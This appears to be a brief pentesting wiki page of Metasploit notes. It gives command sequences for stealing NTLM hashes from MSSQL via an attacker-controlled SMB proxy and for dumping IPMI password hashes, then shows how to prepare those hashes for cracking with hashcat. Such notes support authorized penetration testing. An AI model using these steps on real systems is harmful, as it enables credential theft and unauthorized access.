# metasploit (msf)

## General commands

### Setting RHOSTS to a file
```
set rhosts file:/path/to/file
```

### Turn logging/spooling on
```
spool /tmp/spooly.log
```

## Module-specific info

### auxiliary/admin/mssql/mssql_ntlm_stealer
```
msf
use auxiliary/admin/mssql/mssql_ntlm_stealer
set domain domain.com
set username lowpriv
set password Pass123!
set rport XXX
set smbproxy YOUR.LOCAL.ATTACKER.ip
set use_windows_auth true
```

:::tip
If you get errors like:
```
xp_dirtree failed to initiate authentication to smbproxy.                              
xp_fileexist failed to initiate authentication to smbproxy. 
```

It probably means you haven't set the `set domain domain.com` yet
:::

### auxiliary/scanner/ipmi/ipmi_dumphashes 
```
msf
use auxiliary/scanner/ipmi/ipmi_dumphashes 
set rhost ip.for.vulnerable.ipmi-interface
set OUTPUT_HASHCAT_FILE /tmp/ipmi.hashcat
run
```

Open the `/tmp/ipmi.hashcat` file and remove any IP or user information.  For example, if your file looks like this...

```
192.168.1.5 ADMIN:c28f........
```

...trim it down so it's just:

```
c28f........
```

Then crack with [hashcat](/pentesting/Internal/hashcat).